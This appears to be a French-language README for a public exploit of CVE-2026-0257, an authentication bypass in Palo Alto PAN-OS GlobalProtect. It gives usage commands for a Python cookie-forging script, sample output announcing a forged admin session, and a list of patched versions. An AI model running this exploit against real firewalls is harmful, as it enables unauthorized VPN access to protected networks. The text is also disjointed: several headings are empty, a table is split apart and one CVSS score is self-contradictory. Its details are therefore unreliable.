
CVE-2026-0257
PAN-OS : Vulnérabilités de contournement d'authentification GlobalProtect
Contournement d'authentification dans le portail et la passerelle GlobalProtect
CVE-2026-0257 est une vulnérabilité de contournement d'authentification affectant les composants portail et passerelle GlobalProtect du logiciel PAN-OS de Palo Alto Networks.
Un attaquant distant non authentifié peut contourner les restrictions de sécurité et établir une connexion VPN non autorisée vers les pare-feu concernés.
Remarque : Panorama et Cloud NGFW ne sont pas impactés.
Vecteur (exemple CVSS 4.0) :
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N
Les vulnérabilités de contournement d'authentification dans le portail et la passerelle GlobalProtect du logiciel PAN-OS® de Palo Alto Networks permettent à l'attaquant de contourner les restrictions de sécurité et d'établir une connexion VPN non autorisée.
Le problème provient de CWE-565 : Dépendance à l'égard des cookies sans validation ni vérification d'intégrité.
Non concernés :
Cette vulnérabilité nécessite la configuration suivante pour être exploitable :
Impact élevé sur la confidentialité et l'intégrité des réseaux protégés.
python3 CVE-2026-0257.py --target vpn.company.com
python3 CVE-2026-0257.py --target 192.168.1.100 --user administrator --verbose
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0257 - GlobalProtect Auth Bypass ║
║ Public Key Cookie Forging Exploit ║
║ Author: 0xBlackash ║
╚══════════════════════════════════════════════════════════════╝
[*] Connecting to vpn.company.com:443 to extract certificate chain...
[+] Found 2048-bit RSA key
[*] Forging authentication cookie for user: admin
[1/1] Trying public key...
Cookie (first 60 chars): eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
[+] SUCCESS! Authentication Bypass Achieved!
Username : admin
Cookie : eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
Versions corrigées (appliquer d'urgence) :
| Version PAN-OS | Correctif |
|---|---|
| 12.1 | ≥ 12.1.4-h6, ≥ 12.1.7 |
| 11.2 | ≥ 11.2.4-h17, ≥ 11.2.7-h14, etc. |
| 11.1 | ≥ 11.1.4-h33, ≥ 11.1.7-h6, etc. |
| 10.2 | ≥ 10.2.7-h34, ≥ 10.2.10-h36, etc. |
Prisma Access dispose également de versions corrigées correspondantes.
Solutions de contournement immédiates (si le correctif n'est pas possible) :
| Date | Événement |
|---|---|
| 2026-05-13 | Publication du CVE + Avis initial |
| 2026-05-17 | Exploitation observée dans la nature |
Recommandation : Corriger immédiatement — traiter comme critique malgré le score CVSS de base en raison de l'exploitation active.
Généré au format README — 30 mai 2026
| Métrique | Score | Évaluation |
|---|
| CVSS v4.0 | 7,8 / 4,7 | Élevé / Moyen |
| CVSS v3.x | Jusqu'à 9,8 | Critique |
| Urgence | LA PLUS HAUTE | - |
| 2026-05-29 |
| Mise à jour Palo Alto + Ajout CISA KEV |
| 2026-05-30 | Ce rapport |